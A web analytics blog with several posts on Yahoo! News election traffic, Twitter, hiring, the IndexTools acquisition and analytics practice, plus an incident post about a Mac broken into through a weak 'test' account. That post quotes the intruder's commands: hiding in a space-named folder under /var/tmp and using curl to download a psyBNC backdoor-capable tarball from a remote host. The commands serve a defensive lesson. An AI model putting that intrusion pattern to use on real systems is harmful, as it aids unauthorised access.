Just a quick graph that shows daily page views to Yahoo! News. The green line shows the week before the US elections, while the week of the elections is in blue.
This comes from our internal numbers; for “competitive reasons” I removed the legend indicating volume — but you can see the site was much busier than the previous week. Uniques, PVs, and PVs per unique all were way up.
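For anyone unsure how those three numbers relate, here is a minimal sketch in Python. It is not how Yahoo! computes anything; the `PageView` record, the `traffic_summary` function, and the sample data are all made up for illustration, and it assumes each page view carries some kind of visitor identifier (a cookie ID, say).

```python
from collections import namedtuple

# Hypothetical record: one row per page view, keyed by a visitor identifier.
PageView = namedtuple("PageView", ["visitor_id", "url"])


def traffic_summary(page_views):
    """Return uniques, PVs, and PVs per unique for a list of page views."""
    pvs = len(page_views)
    # A "unique" here is simply a distinct visitor_id (an assumption).
    uniques = len({pv.visitor_id for pv in page_views})
    pvs_per_unique = pvs / uniques if uniques else 0.0
    return {"uniques": uniques, "pvs": pvs, "pvs_per_unique": pvs_per_unique}


# Made-up sample data: three visitors, six page views.
SAMPLE_VIEWS = [
    PageView("a", "/news/election"),
    PageView("a", "/news/results"),
    PageView("a", "/news/map"),
    PageView("b", "/news/election"),
    PageView("b", "/news/results"),
    PageView("c", "/news/"),
]

if __name__ == "__main__":
    print(traffic_summary(SAMPLE_VIEWS))
```

All three can rise together, as they did that week: more visitors showed up, and each one read more pages.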
TechCrunch showed some data from Hitwise on market share of visits for Nov 4. It’s a little strange that Yahoo! wasn’t listed in the TechCrunch graph, even though Yahoo! placed first overall. Also interesting that the Drudge Report was so high. Here are the top 10 .. for more, see Media Life Magazine.
I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up a new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.
Oh, and of course, I set it up with full administrator privileges.
Tonight I’m poking through my log files (I’m still trying to track down the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?
The reason: because somebody else had, three days ago. And changed it.
I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:
3. uname -a
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
See who’s on.
Change the password for user “test”.
See what kind of system this is.
Go to a folder commonly used for temporary files.
Create a folder named “ ” (just a single space).
Change to that folder.
Download a file from the web.
Try the download again.
Give up, and log out.
So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:
curl: (7) Failed to connect to 22.214.171.124: Host is down
So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.
Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:
Do what you can to prevent break-ins.
Log everything so you can figure out how the inevitable break-in happened.
Convenience is often at the expense of security.
I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.
I humbly admit all of this in the hope that you can learn from my near miss.
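If you want to do the same kind of log review without scrolling by hand, here is a rough sketch in Python. It is not what I ran that night. It assumes OpenSSH-style "Failed password" and "Accepted password" messages, which vary by OS and version, and the function name, sample lines, and addresses are all invented for illustration.

```python
import re
from collections import Counter

# Assumed OpenSSH-style message formats; check them against your own logs.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+)")


def summarize_logins(lines):
    """Count failed attempts per user name and list successful logins."""
    failed = Counter()
    accepted = []
    for line in lines:
        match = FAILED.search(line)
        if match:
            failed[match.group(1)] += 1
            continue
        match = ACCEPTED.search(line)
        if match:
            accepted.append((match.group(1), match.group(2)))
    return failed, accepted


# Invented sample lines; the addresses come from documentation-only ranges.
SAMPLE_LOG = [
    "sshd[101]: Failed password for invalid user admin from 192.0.2.7 port 4100 ssh2",
    "sshd[102]: Failed password for invalid user guest from 192.0.2.7 port 4101 ssh2",
    "sshd[103]: Failed password for root from 192.0.2.7 port 4102 ssh2",
    "sshd[104]: Failed password for root from 192.0.2.7 port 4103 ssh2",
    "sshd[105]: Failed password for test from 192.0.2.7 port 4104 ssh2",
    "sshd[090]: Accepted password for test from 203.0.113.9 port 5200 ssh2",
]

if __name__ == "__main__":
    failed, accepted = summarize_logins(SAMPLE_LOG)
    print("Most-tried user names:", failed.most_common(3))
    print("Successful logins:", accepted)
```

The successful logins are the part to read first: any login from an address you don't recognize deserves a closer look, which is exactly what “last test” told me.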
Blogging about Twitter. Reminds me that “talking about music is like dancing about architecture” … and I’ve already blogged about Twitter more than once. While we’re a good year and a half into Twitter, and it’s been mildly entertaining, I’m starting to see value now. So this post is for the folks still scratching their heads.
There’s a critical mass (or tipping point, if you are so inclined) of people you need to follow such that a micro-community emerges. Once that happens, you get two things. One is quick notification of important/interesting events/news/blog posts. In fact since I’m following so many web analytics folks, I no longer have to rely on my RSS reader to bring me the big stories — the community points them out. Of course you need to be following the right people for your interests – people who say interesting things.
Second is the ability to get feedback. I admit I don’t use this a lot, but it can be handy, depending on your community size. Of course it didn’t help me find a 13-year-old copy of Windows…
(In response to Eric’s comment in one of his posts, yeah, my “lazy blogger” tweet to him, welcoming him to Twitter, was paraphrased from something June said to me at eMetrics last spring, about Twitter being the lazy man’s blog. At the time I couldn’t tell if she felt it was a compliment or a condemnation, but now I know.)
What with all the news about Yahoo! laying off people, you could be forgiven for thinking that the company isn’t hiring. But in fact, it is. The company “de-invested” in several areas, but is increasing investment in others. Even the data team changed a number of projects, which impacted some people. But Y! is hiring, and the data team is hiring. In fact we really need help, especially if you know C++ and/or SQL. Details are at http://careers.yahoo.com/
Great read over on the Freakonomics blog with Bill James, the data wizard for the Boston Red Sox. A few choice quotes rang true for me; he could have been talking about web analytics:
I would say generally that baseball statistics are always trying to mislead you, and that it is a constant battle not to be misled by them.
We haven’t figured out anything yet. A hundred years from now, we won’t have begun to have the game figured out.
And on who should have a larger role in player evaluations, scouts or stats guys:
Ninety-five percent scouts, five percent stats. […] the knowledge of who will improve is vastly more important than the knowledge of who is good. Stats can tell you who is good, but they’re almost 100 percent useless when it comes to who will improve.
I’m really jazzed about it. IndexTools is a great group that’s been laser focused on the stuff that customers care about. They have a very practical attitude towards their products. Because they started in 2000, they learned from the pioneers, and built a deep analytics system that really works well. That much was clear as soon as we popped the hood and poked around inside .. unlike a lot of their competition, they didn’t have an old and a new product that they bolted together.
So does this mean we’re going to do “Yahoo! Analytics”, and try to “steal” web sites away from Google Analytics or the commercial web analytics vendors? See, that’s not what this is about. Yahoo! has stated its desire to be a “partner of choice”, and as the new Yahoo! strategy began to sink in, it became clear that the new Yahoo! was going to need to offer a new level of products to its partners. We have many, many thousands of small and medium businesses partnering with us now, and we want to make sure they have the tools they need. We’ve already announced an open strategy where developers can take advantage of Yahoo! products and services; we want to make sure they get the analytics they need too. Yahoo! has so many partners in so many places that can benefit from this technology, it became clear — even obvious — it was now the right thing to do.
Yeah, we still have a team working on analytics solutions for our “owned and operated” world — Yahoo! is too big a customer for IndexTools, or any other commercial vendor for that matter. There’s a world of difference between massive scale for one huge customer, and massive scale for a huge number of small and medium-sized customers. Now we have both.
As for what this means for the web analytics industry, I’ll leave that to the pundits, analysts and fortune tellers.
Here’s some of the combined team after a day of meetings at IndexTools.
(and yes, that’s Dennis at the head of the table, farthest away from the camera.)
In the words of Bill Clinton, “it depends on what you mean by …”
The “web analytics is easy / hard” discussion among various thought leaders has been interesting but, I can’t help but think, a little self-serving. I had a long preachy post ready to go but even I was bored by it. Instead, let me offer some observations:
Web data is messy. For instance, it doesn’t fit into cubes (think path analysis by segment). So it requires special handling.
Web data is noisy. Think robots and cookie deletion.
Web analytics is nonstandard. Despite the efforts of the IAB, WAA and others, nobody can say “we use the computation standard to determine this” – because there is no computation standard. Count web 2.0 for me…
If you want to chase the rabbit down the hole, you’ll decide that web analytics is hard. If you want to defer these kinds of things to a tool vendor who will sell you turnkey “best practices” then web analytics is easy.
In business, speed of deployment is king. Thus it’s easier to look at pre-built reports than create them from scratch.
Lack of integration with the business goals means lack of actionability. Most analytics is like driving by looking into the glove box – interesting but irrelevant.
As a result of the first two, there’s an emphasis on quantitative over qualitative analysis, which means there is very little “analytics” at all, just metrics trending.
When you don’t first design your analysis from business goals, you grab as much data as you can, and pick and choose the data that supports your hypothesis — either you’re in report hell, or analysis paralysis. For a very visceral example of this, look at how most people do experimentation.
If you design your analytics to meet your strategy, and staff for it, the implementation is long (and complex, yes) but the resulting analytics are easy. If you want to defer to a tool vendor who will sell you turnkey “best practices” then web analytics is hard.
It’s been said that people would rather pull off a finger nail than learn how to leverage their website data. I’ve thought about that a lot lately, and think I have the answer:
A good manicure. French, maybe.
But really, this is all soo sad because the reality is that. . . .
Web Analytics is like a drag queen: It has Really Big Hair, killer eye makeup, and knows how to promote itself:
We believe it, but how do we get to a point where others in the organization do as well?
Step One for each and every one of us (and you are unique and abnormal in that you read a web analytics blog!) is to accept and recognize the fact that Web Analytics might be seen as outside the mainstream and a bit freakish. Once you accept that, you can move on and do something about it.
I think that’s all the steps required, really!
With extreme apologies to Avinash, and extreme thanks to June.
PS to Jim Sterne: no, I will not. Don’t even ask, ‘K?
Congrats to WebTrends who announced their new CEO today. Dan Stickel is no stranger to the Internet, having done executive stints at Google and AltaVista.
The press release quotes Dan: “The web analytics market is forecast for nearly 20% growth in 2008, and the growth in enterprise marketing software is even greater.” Looks like the gauntlet has been thrown — this looks like a CEO challenge to WebTrends to do better than 20% growth this year.
It’s great to see such a venerable player getting past the cloud of uncertainty. I don’t know anything about WebTrends’ plans, but given Dan’s recent past at Google, expect to see an emphasis on partners.